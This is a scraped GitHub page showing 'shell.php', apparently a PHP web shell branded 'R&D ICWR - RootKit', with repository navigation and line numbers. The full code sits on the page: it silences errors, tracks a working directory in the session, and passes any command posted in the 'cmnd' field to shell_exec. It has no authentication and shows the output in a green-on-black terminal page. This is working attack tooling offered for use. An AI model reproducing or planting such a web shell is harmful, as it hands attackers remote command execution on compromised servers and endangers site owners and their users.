-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshell.php
126 lines (85 loc) · 2.22 KB
/
shell.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
<?php
error_reporting(0);
session_start();
class shell
{
public function change_dir($cmd)
{
chdir(str_replace($_SERVER['PHP_SELF'], "", $_SERVER['SCRIPT_FILENAME']));
$path = explode(" ", $cmd);
if ($path[0] == "cd") {
if (is_dir($path[1])) {
$_SESSION['directory'] = $path[1];
} else {
$_SESSION['directory'] = getcwd();
}
}
}
public function user()
{
return get_current_user();
}
public function exe($cmd)
{
chdir($_SESSION['directory']);
$check = explode(" ", $cmd);
if ($cmd == "cd") {
$_SESSION['directory'] = str_replace($_SERVER['PHP_SELF'], "", $_SERVER['SCRIPT_FILENAME']);
} elseif ($check[0] == "cd") {
shell::change_dir(str_replace(".", "", $cmd));
} elseif ($result = shell_exec($cmd)) {
return htmlspecialchars($result);
} else {
return htmlspecialchars($cmd) . ": command not found";
}
}
public function term()
{
if (empty($_SESSION['directory'])) {
$_SESSION['directory'] = getcwd();
}
return shell::user() . "@" . gethostname() . ":" . $_SESSION['directory'] . " $ ";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>R&D ICWR - RootKit</title>
<style>
* {
background: black;
color: green;
}
textarea {
width: 100%;
height: 400px;
border: 1px solid transparent;
}
.kotak {
height: 400px;
padding: 20px;
border: 1px solid green;
}
input[type="text"] {
border: 0px solid transparent;
color: white;
background: transparent;
}
.res {
overflow: auto;
}
</style>
</head>
<body>
<?php if (isset($_POST['cmnd'])) {?>
<div class="res">
<?php echo shell::term() . $_POST['cmnd']; ?>
<br>
<pre><?php echo shell::exe($_POST['cmnd']); ?></pre>
</div><?php }?>
<form enctype="multipart/form-data" method="post">
<?php echo shell::term(); ?><input type="text" autofocus="autofocus" onfocus="this.select()" name="cmnd">
</form>
</body>
</html>